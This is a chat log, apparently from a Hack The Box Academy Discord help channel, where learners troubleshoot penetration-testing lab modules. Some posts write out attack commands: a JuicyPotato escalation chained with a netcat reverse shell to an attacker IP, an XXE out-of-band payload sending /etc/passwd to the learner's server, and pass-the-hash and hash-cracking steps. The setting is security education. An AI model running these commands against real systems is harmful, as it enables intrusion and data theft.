#modules

1 messages ยท Page 398 of 1

fathom pendant
#

high/medium/low with a "recommended" best

waxen totem
#

Ngl dont pay attention too much to it until I have a connection problem kek

#

Just pick everything that looks fast

gusty ivy
#

Itโ€™s too slow itโ€™s not working

waxen totem
gusty ivy
waxen totem
gusty ivy
rustic sage
#

Windows Evasion Techniques > Static Analysis:

Im bypassing AV according to log.txt but the flag isn't generating

rustic sage
#

I think they're very specific testcases

#

I'm retesting mine now

#

like the code inside really matters

minor sonnet
#

Module : Introduction to Windows Evasion Techniques
Section : Static Analysis

the problem is that the flag is not generated

minor sonnet
rustic sage
#

Looking at the previous responses about this issue

#

it seems like the code is the problem

minor sonnet
#

are you using c#?

rustic sage
#

mhmm

#

And I'm deving "locally"

frigid plaza
#

Thanks! But when you send requests with that content type, you can't see the output because it's not blocked by the WAF and it doesn't appear in the logs. Am I wrong? How can I see the response to my payload?

wild rapids
cloud urchin
neat pelican
#

it hasn't been 24 hrs you get to cater illegal bs like that

lusty thicket
#

lol

cloud urchin
#

I've never really seen a good AI detector. Put the American constitution in there and it'll be like 98%+

#

i guess the founding fathers used chatgpt

deep bay
cloud urchin
#

Also I have to delete that as you're posting content above t0

safe star
#

AI checkers dont even make sense ngl

lusty thicket
#

lol

#

they detect predictability

fresh wedge
#

someone pls help its been hours this POtato is not cooking....... windows priv esc assesment part 1....... here is what im trying can someone help......C:\Users\Public\JuicyPotato.exe -l 1337 -t * -p "C:\Windows\System32\cmd.exe" -c "{42CBFAA7-A4A7-47BB-B422-BD10E9D02700}" && C:\Users\Public\nc.exe -e cmd.exe 10.10.1x.x 1337

#

it says it works but creates no shell

safe star
#

why are you using &&

#

make it run nc not cmd

cloud urchin
#

the && is a whole new command outside of juicypotato.exe

#

pretty sure you need to include the command you want juicy potato to execute as arguments for the potato exploit itself, not a second command unrelated to it

fresh wedge
iron oracle
#

Hi everyone, im on the Active directory enumeration module and im following the tutorial for crackmapexec asreproast, however when i follow the instructions I receive this error message. Has anyone experienced this before?

crackmapexec ldap dc01.inlanefreight.htb -u users.txt -p '' --asreproast asreproast.out --verbose

Error resolving hostname dc01.inlanefreight.htb

cloud urchin
#

You must be connected to the VPN and put the host in your /etc/hosts file, those are the two primary reasons why you wouldn't be able to reach it. If you're not using the VPN you can use the pwnbox instead.

limber river
#

there will be new modules on the AI path ?

cloud urchin
limber river
#

nice hopefully they keep it on tier 2

iron oracle
cloud urchin
waxen totem
#

I think you also need the base domain

#

e.g
(TARGET IP) inlanefreight.htb dc01.inlanefreight.htb

iron oracle
thin parrot
#

Anyone have a reason as to why the shell script for installing odat does not install odat?

#

./odat.py results in "no such directory hurrdeedurr"

cloud urchin
#

you could try manually running each step to see where it fails

thin parrot
#

or maybe the people who are paid to write this shit maybe should like uhhh I dont know maybe keep on top of these things? for their paid service?

#

because im not seeing any indication of installation failure

cloud urchin
#

worked for me

thin parrot
#

well thats great good for you

cloud urchin
#

are you running it on a vm? maybe try the pwnbox if so

#

oh i think this is that pycryptodome issue i saw someone talking about

#

also sounds like you didn't cd into odat

thin parrot
#

I attempted to the directory was not even made.

fringe hollow
#

Does anyone actually build their own notes based on HTB Modules and Paths or do you just use alternate resources while you are going through the assessments?

cloud urchin
#

most definitely take notes.

vivid forum
#

Anyone I can dm for File upload skills assessment? I am having issues with it.

ornate palm
#

Question... i am doing the module Information Gathering - Web Edition - Page 8 - DNS Zone Transfers

When i do a dig -x on the target ip provided i am not able to get the domain which would have allowed to later look for the ns records.
I understand the issue might be due to the ip being an internal ip.

How would you go about looking for the domain or ns records for internal ip

`[โ˜…]$ dig -x 10.129.156.204

; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> -x 10.129.156.204
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 19260
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;204.156.129.10.in-addr.arpa. IN PTR

;; Query time: 3 msec
;; SERVER: 1.1.1.1#53(1.1.1.1) (UDP)
;; WHEN: Tue Mar 11 21:24:12 CDT 2025
;; MSG SIZE rcvd: 56`

fringe hollow
# cloud urchin most definitely take notes.

Just curious because these modules take a lot of time to take notes on, and with an assessment coming up, Iโ€™m looking for a quicker way to figure out the right approach when Iโ€™m unsure what method to use. Any tips on making this process more efficient?

cloud urchin
#

what do you mean assessment coming up? CPTS is go at your own pace. everyone is different for learning, i think adult learners do better if they are hands on. writing your own notes and commands etc helps with memory retention as well, but ultimately it's going to be what works best for you taking notes. you don't want to speed run through it, you really need to understand the content.

fathom pendant
waxen totem
fathom pendant
dry falcon
#

bro still no usernames from yesterday ๐Ÿ˜ญ

fathom pendant
#

you need to adjust the timeout

dry falcon
#

your and mine time is different

fathom pendant
#

?

cloud urchin
#

everyone's time is relative

dry falcon
#

oh u say timeout i thinking u say fix u machine time, lol

dry falcon
# fathom pendant ?

bro how to specify timeout in this tool , i see help their is no such option. sadglas
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7

waxen totem
dry falcon
waxen totem
lusty thicket
#

reading the options

dry falcon
#

-w n damn .

leaden flax
#

I need help with Password Attacks , Pass the Hash, Q4 with davids hash, I passed the hash with mimikatz, but I keep opening a new session as administrator and not as David

#

how do i access the shared folder?

#

like there is no DC shares, i feel like this box is broken

regal ruin
#

how to clear database of bloodhound ...??

leaden flax
#

nah this is crazy, ive tried everything and there is no share DC01

brave field
#

Hi guys. Need some really specific help in something concerning the printnightmare vuln in the AD enum and attacks module. Please if someone is available in dm just let me know. Thanks.

waxen totem
leaden flax
waxen totem
pseudo kiln
#

anyone has issues with spawning academy targets ?

#

nvm it works now

neat pelican
#

This living off the land section of AD can't be absorbed within just a day. There's so much info lol

young ore
#

You get partial access, so thatโ€™s why youโ€™re still admin but you get access to the shared folder

green shuttle
#

if anyone could help with intro to whitebox command execution section that would be nice.

opaque geyser
#

Can someone help me on this module : Coercing Attacks & Unconstrained Delegation

#

How do I get into BOb again without an IP

young ore
opaque geyser
#

Wait which one was Bob lol

#

Maybe Bob!=WS001

#

I think i was just overtired I think i can get it now

leaden flax
#

holy f , finished the Pass the hash section

#

that one was brutal

fickle crystal
#

Aye why some people be having ruby gold and all them badges someone explain

languid ginkgo
#

Hi,
Can I track my progress on HTB Academy using the Student ID, and how?
I saw that it was possible via an API. How can we get an API token and documentation ?

young ore
#

I tried but reach dead end as well, so i concluded itโ€™s for enterprise user. I may be wrong idk

young ore
vagrant gust
#

for me it kept giving me the error 429 iirc

#

gave it like half an hour and it gave the same error

#

mightve just been an off day but it was the last thing i needed to finish the module and got on my nerves

waxen totem
uneven niche
#

I'm trying to redo the Blind Data Exfiltration section to test a few things out since I was having trouble with the Skills Assessment at the end of the module. I remember this working on my first or second try when I initially did this section, but now that I've gone back I can't get the data from /etc/passwd or the flag at the end of the section to output into my terminal. I extracted the data using XXEInjection, but that tool isn't working in the skills assessment, so I'm currently trying to figure out what I'm doing wrong with the PHP server method.

My .dtd file:
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % oob "<!ENTITY content SYSTEM 'http://MY_IP:8000/?content=%file;'>">

My request to the web app:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE email [ <!ENTITY % remote SYSTEM "http://MY_IP:8000/xxe.dtd"> %remote; %oob; ]> <root>%content; </root>

The output I receive on my terminal:
[Wed Mar 12 05:33:23 2025] 10.129.142.203:36428 Accepted [Wed Mar 12 05:33:23 2025] 10.129.142.203:36428 [200]: GET /xxe.dtd [Wed Mar 12 05:33:23 2025] 10.129.142.203:36428 Closing

According to the section, my output should be:

`10.10.14.16:46256 Accepted
10.10.14.16:46256 [200]: (null) /xxe.dtd
10.10.14.16:46256 Closing
10.10.14.16:46258 Accepted

root: x :0:0:root:/root:/bin/bash
daemon: x :1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin: x :2:2:bin:/bin:/usr/sbin/nologin
...SNIP...`

My index.php and xxe.dtd file are both in the same directory as the PHP server I'm opening. I'm not really sure what I could possibly be doing different than what I did the other day when it worked.

Also, here is my index.php file:
`<?php

if(isset($_GET['content'])){
error_log("\n\n" . base64_decode($_GET['content']));
}

?>`

storm elk
#

@dry falcon - do not spoil credentials. Just ask a question with a reference to a module and section.

dry falcon
#

i added **** in it

pseudo kiln
#

I am going back through CPTS modules and I could have sworn there was a section on ntlmrelayx.py . Am I dreaming or was it removed ?

#

If I remember right it was removed when they released the NTLM Relay Attacks module

dry falcon
storm elk
#

Read the second part too - still missing the module and section

storm elk
#

Name the module and section please. Clicking a link on mobile is a pain in the ass.

dry falcon
#

done

vagrant gust
#

was a skill issue ๐Ÿคฃ

ornate palm
waxen totem
dry falcon
#

why command are not working ๐Ÿ˜ญ and when i run in pwnbox it work what the hell . ๐Ÿ˜ญ ๐Ÿ˜ฉ

safe star
uneven niche
#

ok I'm at a brick wall.. please help.

I'm doing the web attacks skills assessment and I have escalated privileges and have currently tried everything I can think of to parse XML using XXE to get some sort of info or the flag. I'm receiving a null output with many various payloads rather than the string, and I've identified how the payload needs to be constructed to receive the null output, but I can't receive any info in the output. I'm assuming the payload is executing properly, but I can't get any oob attacks to work to grab any files.

grizzled schooner
#

for password attacks - I'm on password reuse / password default

For the sql question - it mentions to use the previous credentials to find the sql login... Just want to make sure I'm not going crazy, does it want me to mutate the last questions credentials for the login? I ran an nmap and don't even see sql running... A bit confused here and nudge would be great

wooden trail
gray yacht
sweet jewel
#

hi all, getting terrible latency to academy. issue persists on both EU and US VPNs

#

anyone aware of any fixes? VPN is using TCP

rustic sage
#

This is EU UDP

wooden trail
#

as the file you are trying to get might be crushing the xml, if I did not explain myself properly

#

id use a wrapper instead

ornate palm
uneven niche
uneven niche
# wooden trail what was it?

I haven't solved it, but I figured out my problem. I've been adding % instead of & at the beginning of my entity references for the past few hours ๐Ÿ™ƒ At least I can start to figure out how to solve this

sweet jewel
tiny cave
#

Hi all, I am current attempting AD Enumeration & Attacks - Skills Assessment Part II

I have compromise the MSSQL server and exploited it. I am attempting to extract the hash using Mimikatz, but the hash provided to me is wrong. I used netexec commands to exploit + obtain reverse shell + upload necessary files.

uneven niche
#

damn i feel really dumb. I probably would've benefited from just sleeping on it ๐Ÿ˜‚ live and learn I guess

hushed rivet
#

% is for other case

#

when u cant join external and internal entity's

#

plus u dont have to feel dumb, its studying ๐Ÿ˜›

uneven niche
hushed rivet
#

also make sure u make good notes

#

helps alot

#

taking breaks sometimes is also great

uneven niche
# hushed rivet also make sure u make good notes

Oh yeah my notebook has been filling up. I'm trying my best to keep them succinct, but there's so much info it can be hard sometimes. My note taking has improved somewhat so I'm sure I'll get better at that as time goes on, too

hushed rivet
#

what are u using for note taking

uneven niche
#

KeepNote

hushed rivet
#

oh thats not online

#

i use gitbook way more friendly for the eyes ๐Ÿ˜›

uneven niche
#

word I'll look into that

hushed rivet
#

ill dm you screenshot of my notes

#

how it looks

uneven niche
#

๐Ÿ‘ thank you

hushed rivet
#

your welcome

shut wraith
#

if I'm building with the vs studio and it says it needs the built dll with it how do i change config to only need the exe itself

rotund oak
#

Hello everyone

storm elk
#

hi @rotund oak

shut ice
#

Anyone done AD trust attacks recently? For Cross Forest attacks when SSH over to the target the shell isn't stable, when the shell gets to the bottom of the screen it doesn't scroll up and the next command just overwites the bottom line, the buffer is set to 9999 and won't let me change.

wild haven
mystic narwhal
#

Hi all! I'm doing the windows evasion techniques module and I'm stuck at the LOLBAS: RunDll32 section. When I compile I get the error CS5001 "Program does not contain a static Main method suitable for an entry point". Does anyone know what I can do?

gray yacht
gray yacht
rustic sage
#

we don't do that here lol

severe inlet
#

I wanted to ask a question
Right now in the active directory enumeration & attacks
I find my self understanding everything and not taking much time in the questions given
however i can't really solve anything till i copy and paste the commands like i mostly don't write anything
is that okay or should i be able to write the commands myself?

dark hedge
#

you should be able to apply the concepts and skills you've learned in order to solve the exercises and the skills assessments

#

you are not going to remember commands most of the time so you can use a cheat sheet

#

there should be one provided in that module

fathom pendant
#

I would say that if you have to copy paste if it's a basic/simple command, then you're likely not understanding the command

dark hedge
#

at some point you should be able to type some basic commands but you're not going to remember the long commands

#

or maybe you will

fathom pendant
#

Well yeah it's just frame of reference type of thing

dark hedge
#

like setting up an SMB server for transferring files in your current dir -- sudo smbserver.py -smb2support share .

fathom pendant
#

If you know which command/one-liner you need, sure

#

But if you need to blind copy/paste until it works, no

west vault
#

Greetings hat

full notch
#

Hi

lusty thicket
#

hi

gray yacht
#

prime_eagle you can quit DMing me.

west vault
#

Check your box

fathom pendant
gusty ivy
severe inlet
#

Thank you marcielee and calculac0re

humble ravine
#

Is there a known issue with Windows Targets? Mine comes online but then gets unresponsive as I log in using xfreerdp

rustic sage
#

hello everyone,
I am an newbie learner from HTB, and i am confused in choosing modules.
i am currently using linux as my main OS.
please help!

deep bay
#

choose a job role path instead @rustic sage

rustic sage
#

i am thinking of taking linux fundamentals

daring tundra
fathom pendant
#

or choosing a skill path

rustic sage
#

ok

#

i will do that

daring tundra
#

Take your time

fathom pendant
#

linux fundamentals is the pre-req to pentester

daring tundra
#

the more you understand, the easier it becomes for the later modules

daring tundra
rustic sage
#

i think skill path will boost my resume

blissful harbor
#

Hey is anyone else having a hard time fuzzing the /admin directory using burp in the "Using web proxies" module?

dark hedge
rustic sage
#

i always wanted to become an hacker (offensive)

#

thats my dream

dark hedge
#

what specific area of pentesting do you want to focus on

#

web, network, ...

rustic sage
#

network

dark hedge
#

then you should probably start with the Information Security Foundations skill path, then you can pivot to the Penetration Tester job role path

rustic sage
#

ok, i will see that
thank u for giving ur time

fresh wedge
#

can anyone assist with hasc crak for Windows priv esc assessment II? have the hash but cant find a wordlist when using hashcat.

gray yacht
rugged bolt
#

sometimes there's a wordlist provided in the 'resource' tab

acoustic owl
fresh wedge
#

After escalating privileges retrieve the NTLM hash for this user and crack it offline. Submit the cleartext password for this account.

gray yacht
shut ice
tired atlas
#

Hi guys for Pass the Ticket Linux, there are 2 krb5 tickets for julio, one of them is expired and the other one, when I try copying it, it says the file doesnt exist, so I'm kinda lost tbh

tired atlas
#

there are websites

fresh wedge
#

all them require registration

shut ice
tired atlas
#

it respawned, the name of the file into something else, when i did ls -la /tmp again

shut ice
#

Yeah would have caught me too ha

fresh wedge
#

find /usr/share/seclists/Passwords/ -type f -name "*.txt" -exec cat {} + > combined_wordlist.txt

hashcat -m 1000 -a 0 admin_hash.txt combined_wordlist.txt --force

still nothing....therew everywordlist in seclist directory and subdirectory at it

shut ice
#

What lab you doing?

#

@fresh wedge

fresh wedge
#

windows prive esc assesment part II

tired atlas
# shut ice Yeah would have caught me too ha

no actually im stupid, so the wrong one, is expired but when I use it and then do ls -la /tmp file, another ticket under julio arrives, but if I respawn target, the command shows the expired one and another ticket which is basically has no credentials in it

tired atlas
#

I'm so confused

shut ice
#

@tired atlas what HTB path is it in?

tired atlas
#

Pass the Ticket Linux, under Password Attacks

#

I'll show you what i mean here

#

the HRJDUX one I highlighted in white is expired

#

the one under it is invalid

shut ice
#

Ah I've not done that module, thought it might be in the CAPE path. Are you copying them from a windows box? They should have a .ccache extension I think on Linux?

gray yacht
#

That's probably considered a spoiler.

shut ice
#

They'll be steps in the module if you do, sometimes the SA mix different parts you've been shown before

tired atlas
#

its from a linux box, and I'm trying to get that ccache file and use it to impersonate Julio

safe star
safe star
tired atlas
tired atlas
tired atlas
#

how do I know that

safe star
#

by checking tmp for the file

tired atlas
#

nope cant cat it

safe star
#

then it changed

tired atlas
#

OH MY LORD

#

what do i do then

#

got it

#

I just used the expired ticket, then ls -la /tmp, to find new changed ticket and that worked woohoo

nimble scroll
#

hi

#

File Upload Attacks
Page 11
Skills Assessment - File Upload Attacks
Skills Assessment - File Upload Attacks , I tried to find the hidden directory of the file uploaded with burp suit but could not find a way to activate the shell , can anyone help?

toxic ingot
#

smbclient -U bob ////10.129.13.178//users
password for {WORKGROUP/bob}: "Welcome1"
do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)

#

Service Scanning

safe star
fathom pendant
#

@coral plank this channel isn't for help with ctfs, if it's active then you're just gonna have to wait

#

This channel is for help with htb academy modules

coral plank
#

@fathom pendant I am literally sorry, I won't do it again.

nimble scroll
#

I got 2 hours and got no hint to get the flag :/

#

Try to exploit the upload form to read the flag found at the root directory "/".

deep bay
#

@nimble scroll you could DM me for the file upload attacks skills assessment.

languid ginkgo
tulip sequoia
#

somebody can help me in dante prolab

#

facing a breaker while pivoting through chisel

waxen totem
#

You need to use the vpn

waxen totem
opaque geyser
#

How do I connect to BoB in windows attack and defense challenge : PKIesc1

#

I am only given 1 IP and thatโ€™s for Kali

#

The static IP for WS001(Bob?) doesnโ€™t work for me

fathom pendant
#

connect to kali then connect to bob through kali

humble ravine
solid epoch
#

in hydra, i can do : ftp://<IP>
or i do: <IP> ftp , correct ?

fathom pendant
#

protocol://ip works

#

otherwise you'd specify the protocol directly after
hydra ftp ip

solid epoch
#

yes thank you

#

also , can someone provide me the solution for this ? man i am brute forcing all services found on the host but cant get the password -_-

#

and the list is 7k lines long

#

its Password Mutations in Password attacks

#

meh its okay
i will just continue And let the bruteforce run by itself

fathom pendant
#

did you try using a mutated password list as instructed by the module?

solid epoch
#

Yes

fathom pendant
#

did you mutate the password.list with the given custom.rule?

#

as in the one from resources, not the one from the reading

solid epoch
#

And also ; i am bruting || FTP ||

#

Yes I ran the proper command

fathom pendant
#

the total mutated list should be ~94k words, not ~7k

solid epoch
solid epoch
fathom pendant
#

64 threads breaks a lot

#

try using a little less

solid epoch
#

yes
I also remember that ssh attacks are really slow
I will go to like 8 threads ?

fathom pendant
#

but this module also exercises patience, it's one of the few that breaks the "if it's not cracked in 5 minutes, you're doing something wrong"

fathom pendant
solid epoch
fathom pendant
#

i believe the guide uses like 52

solid epoch
#

i will read it again lets see

#

i hate brute forcing

fathom pendant
#

guide == annual perk walkthrough

#

not the direct reading

solid epoch
#

i think on the machine nibbles i got banned when i tried to brute force ๐Ÿคฃ

#

after that i didn't like it

fathom pendant
#

you didn't need to brute nibbles

solid epoch
#

Yes just guess it, but how -_-

#

i really gone through all xml files

#

no password

indigo cargo
#

I have a problem in nibbles, i accidentally messed the monitor.sh script up because i forgot to adjust the command to my ip and then i tried to vim it to get it right but something went wrong there.

solid epoch
indigo cargo
#

I can but there is already a line for the reverse shell with the wrong ip before the one with my ip

#

will that not matter if i just add the correc tline at the end?

solid epoch
#

run sudo -l
make sure the path to the sh is correct,

fathom pendant
#

Patience is the solution

solid epoch
#

and then you can empty the file completely , and run bash -c '#reverse shell here'

fathom pendant
solid epoch
#

But dont forget to not delete the first line , so the system knows that its a bash file

indigo cargo
#

Allright thank you both!

solid epoch
fathom pendant
#

You want as minimal disruption as possible, deleting the whole file would be noticed fast

deep bay
#

I was just echo /bin/bash >> monitor.sh to got root access

solid epoch
#

I am really lucky to be in this community Learning alot

nova pivot
#

Hello there! Just finished Skill assessments for the Shells module, I have a question about the first host. There are two vectors of entry, and one of them needs credentials, given in the hint about the first host. Is there a way to find those credentials without looking at the hint ? They were not the default ones, so I'm wondering.

fathom pendant
solid epoch
safe star
solid epoch
# safe star Wydm old sudo

for example there is a shell script for privilege escalation for sudo versions between 1.8 and 1.9, this is what i mean

safe star
#

The linux privesc module covers this

#

But thatโ€™s later in the path

nova pivot
fathom pendant
solid epoch
#

:) : )

nova pivot
fathom pendant
#

missing the forest for the trees :)

nova pivot
#

Since there's a similar file on the PwnBox Desktop with no "task related credentials", I didn't thought those might be different. Will know next time I have to use one though ๐Ÿ‘Œ๐Ÿป

fathom pendant
#

pwnbox is independent to the given lab environment

nova pivot
#

Won't make the same mistake I hope!

fathom pendant
nova pivot
fathom pendant
#

there's a few cases in other modules where the important text file is just right there when you rdp in kek

cloud urchin
#

I would be surprised of the module told you to modify your resolv.conf file, have you tried the normal way with just adding the hosts to /etc/hosts?

#

Also please make sure not to post content from modules above tier 0

polar raven
#

module is asking fot it yes
Sorry, but I really just wanted to show the problem

cloud urchin
#

You can ask without revealing info though. I see that and it worked fine for me, but I didn't use the FQDN just the hostname.

polar raven
#

that's what i'm doing with bloodhound
dc ACADEMY-EA-DC01

cloud urchin
#

try without proxychains, the module shows it without, that's the way i did it and it worked

polar raven
fathom pendant
#

in real ops: it'll depend

cloud urchin
#

in real ops i don't think you'd be pivoting through another attack box

#

wouldn't you just use the attack box already connected?

polar raven
fathom pendant
#

there's also pivot tools that don't rely on proxychains

#

like ligolo-ng, and ligolo-mp

quartz lagoon
#

like it didn't work when i set the env variable to "/tmp/...." but it did when it was "/root/..."

#

weird

#

maybe it has to do with the fact that i was the "root" user so i needed to specify my directory (root/) to the env. variable

#

well nevermind everything i wrote, the location of the file has nothing to do with needing to be in the user's directory

#

does anyone know why i couldn't export the ccache file's filepath in the KRB5CCNAME environment variable? was it because it was in /tmp?

fathom pendant
#

shouldn't matter too much if it's in /tmp/ did you use the full filepath?

quartz lagoon
#

i just killed my pwnbox so i can't check my history but maybe i didn't yeah

#

but i mean as long as i know the filepath doesn't have to comply to certain rules as long as it's the full filepath i'm fine lol, thanks

fathom pendant
#

in general: best practice for environment variables is full filepaths

cloud urchin
#

all of them till you find it, doesn't take that long

frank stirrup
waxen totem
#

Most of them'll end pretty quickly anyway

#

Actually Imma save you some time now its not in that list

fathom pendant
#

the answer is in the format of b.a.inlanefreight.htb where a.inlanefreight.htb is one of the subdomains, i suggest doing a dig axfr on the base domain first instead of jumping straight to the list/bruteforce

frank stirrup
#

Okay , thanks alot for the hint , atleast am assured i would'nt wait till eternity.

idle glacier
#

what machine can i use to practice ADPowerview

cloud urchin
#

do you mean boxes in the lab or a module?

idle glacier
#

labs like machines for CTF challenges

cloud urchin
idle glacier
#

i don't have access

cloud urchin
idle glacier
#

@cloud urchin I got it thank you !

ebon isle
#

Hey, does anyone know why Academy has quite often issues with deploying the target? I have apparently the issue that it deploys forever and I cannot continue :/

ebon isle
#

I did, it did not help

cloud urchin
#

try spawning it in another browser or changing vpn servers. if you change vpn servers press CTRL+SHIFT+R again before you spawn the target after you connect to the vpn.

ebon isle
#

I donโ€™t connect to vpn, I usually use the attack box

#

Another browser also doesnโ€™t work

cloud urchin
#

Okay try changing servers or regions then.

#

Also, maybe disable any extensions you may have, especially ad blockers.

ebon isle
#

Also doesnโ€™t work, this is now the 5th time I am facing such an issue, really not cool

cloud urchin
#

Best to reach out to support on the website then.

ebon isle
#

Yeah but please try to fix that internally also

cloud urchin
ebon isle
#

Oh apologies haha yeah I did

cloud urchin
#

did you try changing regions after that

#

which module is it btw?

ebon isle
#

Yep I did

#

Itโ€™s enterprise htb Windows Attacks and Defense - Kerberoasting

cloud urchin
#

i just tried to spawn the target and was successful

#

it's very likely something on your end

ebon isle
#

Hmm Strange

cloud urchin
#

Please try re-asking your question without spoiling content from the module

silent prawn
ebon isle
#

Ok Works now

#

But now I have another error, I need to connect to the DC and get the following:

cloud urchin
cloud urchin
ebon isle
#

Itโ€™s up for about 40 mins xD and also with quotes I get the same error

#

Or do I need to put away the eagle?

fathom pendant
#

there's likely a first target to go through

cloud urchin
#

oh yeah good catch that too

fathom pendant
#

i.e. an attack box --> windows target

ebon isle
#

Okay and in the windows target then again xfreerdp?

fathom pendant
#

i believe this module has the starting machine 10.129.x.x as a kali box then another internal network target which would be the eagle\bob windows machine

wooden seal
#

anyone getting blackscreen while rdp(ing) to the target machine (module - ACL Abuse Tactics)

ebon isle
#

Yes correct I am in the eagle\bob windows machine now

fathom pendant
#

do whatever the section is detailing you to do

wooden seal
#

thinking its loading something maybe

fathom pendant
fathom pendant
waxen totem
#

Academy should include emulations of networking device cli's in their networking modules including simulating using a faulty serial cable kek

ebon isle
#

Yeah that was it, connecting to bob first and from there to the DC my goodness they could have mentioned thisโ€ฆ.

fathom pendant
#

it's kinda how any AD lab is set up in the modules and was likely mentioned in the beginning

timid oar
#

has anyone run into an issue downloading from one of the lab ftp servers?
Specifically the ||"Password Attacks Lab - Easy" module
I can connect with credentials|| via an ftp client but the download is stalled at 0%. I've tried ftp curl wget. I tried switching vpn servers.
I seem to be able to interact with other (non-htb) ftp servers fine.

fathom pendant
#

it worked fine for me previously

#

try reconnecting to the vpn; sudo killall openvpn and reconnect

rustic sage
timid oar
fathom pendant
#

so that's just not even in the cards

timid oar
fathom pendant
#

nope it's similar to the VIP+ package on htb labs; all the private ip range targets are only accessible to you

#

it would massively hinder learning if other people could mess with your target

timid oar
waxen totem
#

this affected some people's ssh experience and might affect that as well

timid oar
waxen totem
timid oar
#

welp,
I went to 1600, didn't work
went to 1400, worked
went back to original 1500, worked????

technology is amazing

fervent lantern
#

help me please sadglas

waxen totem
fervent lantern
#

๐Ÿ˜ฆ

fervent lantern
#

HTTP Requests and Responses

#

that's what it's called

waxen totem
#

aight so what response are you getting?

fervent lantern
#

I don't know what the X.Y.ZZ format is.

waxen totem
fervent lantern
#

Thank you very much too

plain charm
#

I am currently stuck at attacking common services modules attacking database section. I know this shouldn't be that frustating but still I am very annoyed by the last question. here's what I did so far

  1. log in with given user with impacket mssqlclient.py
  2. got the hash of the service user
  3. logged in with mssqlclient.py
  4. use the flagDB to select the database

That's it. I can't move forward, every command I type returns nothing. tried the commands from the modules, saw the forums, got some commands, but it just doesn't return anything.
any help would be helpful.

fathom pendant
#

sometimes it's a bit buggy

atomic rivet
#

Hello

indigo cargo
#

im finishing up the getting started guide of the penetration tester module and im doing the knowledge test. I have experienced some lag using the built in vm so i wanted to try to connect to the vpn and using my own vm.

#

All i have to do is connect to the vpn and i should be able to reach the host right?

#

Because i did that and i cant ping the host im given, it says Destination Net Unreachable.

fathom pendant
#

are you running the pwnbox at the same time?

indigo cargo
#

No

fathom pendant
#

did you ctrl-c after connecting bc the "terminal froze"

#

once you get the Initialization Sequence Completed message, you open a new terminal and leave that one alone

#

otherwise:

compact patrolBOT
indigo cargo
#

OOhhh, i connected my actual laptop to ovpn not just my vm

#

should i connect inside my vm?

fathom pendant
waxen totem
fathom pendant
#

connect from vm instead

#

while you can do some shenanigans to use host vpn adapter; it's a lot more trouble than it's worth

indigo cargo
#

alright thanks!

waxen totem
indigo cargo
#

is there a guide anywhere for the right way to connect because i feel like im doing something wrong

#

nevermind got it!

shut ice
#

Anyone done "Trust Account Attack" in AD trust attacks? You are told to ssh via proxychains but my shell stops scrolling when it reaches the bottom of the screen

shut ice
#

Does anyone know how to raise a ticket/report an issue with a lab?

compact patrolBOT
fathom pendant
#

if it's urgent ^

indigo cargo
#

Does anyone know why i cant download something from github to my pwnbox from HTB

#

I can ping sites but i can not curl them or visit them in browser

fathom pendant
indigo cargo
#

ah okay but how are you supposed to get files onto it then?

fathom pendant
#

should be able to git clone

indigo cargo
#

alright, buying a membership after this box then haha

fathom pendant
#

but i never bothered too much with it, had my own vm set up and never thought about it

rough tree
#

Someone who managed to pass the skill assessment lab at "Evil-Twin" module?
I need some help about the exercise ๐Ÿ˜„

prime pilot
#

for the question
In networking, what term describes the communication pathways (wired or wireless) that connect nodes?
the response is medium ?
but they say no some one can help me pleas

charred forge
#

hi, quick question
why is it that my own VM tend to process way slower than the pwnbox provided
for example it only took 5s for hydra to find the password on pwnbox however its taking forever on my own VM
thanks!

plain radish
#

hey guys, can someone help me with this question of "Password Reuse/Default Passwords" section of "Password Attacks" module. The question in which we have to find the default 'mysql' creds, I have found this resource 'https://github.com/gauravnarwani97/MySQL-default-credentials/blob/master/default_db_credentials1.txt' containing default creds for mysql then to perform password spraying mysql using hydra 'hydra -C user-password.txt mysql://target's_IP' but the target's 3306 port is not running, even tried the 'mysql_login' module of msfconsole still showing the port is closed also conformed through nmap scan

gray yacht
lusty thicket
#

maybe they want a more specific term

plain radish
gray yacht
#

Focus on the service

fathom pendant
fathom pendant
#

@plain radish your screenshot contained spoilers

plain radish
#

should I blured the flag part ?

fathom pendant
#

Just be mindful in the future

plain radish
sharp torrent
#

Can someone provide a hint for windows privilege escalation - other files assessment please ?

elder matrix
#

does anyone have any idea why when i use sqlmap, despite being as a dba with file permissions, i still can't read or create files anywhere on the machine?

#

what are some things i can look for?

solid epoch
#

https://academy.hackthebox.com/module/147/section/1359

I got the password in cleartext, but when i submit it it says incorrect, but its the password

Q: Apply the concepts taught in this section to obtain the password to the Vendor user account on the target. Submit the clear-text password as the answer. (Format: Case sensitive)

#

wtf

#

after i manually typed the password it worked

#

strange

digital sun
#

i wanted to ask something if someone is at the very begining of cyber security but has a basic knowledge of software engineering stuff from where should he start (academy, labs, something else) and where exactly in one of those

solid epoch
#

im doing it soon!! thank you

iron oracle
#

Has anyone had any issues with chisel and proxychains using crackmapexec?

sharp torrent
#

Can someone provide a nudge for windows privilege escalation - other files lesson assessment please ?

soft rune
#

Hi have a HTB account with my student payment but i cant acces the path anb the modules section y already finished my information security information foundations paths and being a student i might have acces to the pentesting path and bug bounty

rustic sage
#

how many cubes is it to 100% academy

compact geyser
#

can i get some help withj networking fundamentals module?>

#

Which protocol manages data routing and delivery across networks?

compact geyser
iron oracle
# gray yacht Like in the cme module?

Yes! I'm doing the Stealing hashes CME module where the target machine is already running chisel. I connect to chisel from my end but I cant find 172.16.1.10

โ””โ”€โ”€โ•ผ [โ˜…]$ sudo chisel client 10.129.149.117:8080 socks 2025/03/13 10:57:40 client: Connecting to ws://10.129.149.117:8080 2025/03/13 10:57:40 client: tun: proxy#127.0.0.1:1080=>socks: Listening 2025/03/13 10:57:41 client: Connected (Latency 10.605141ms)

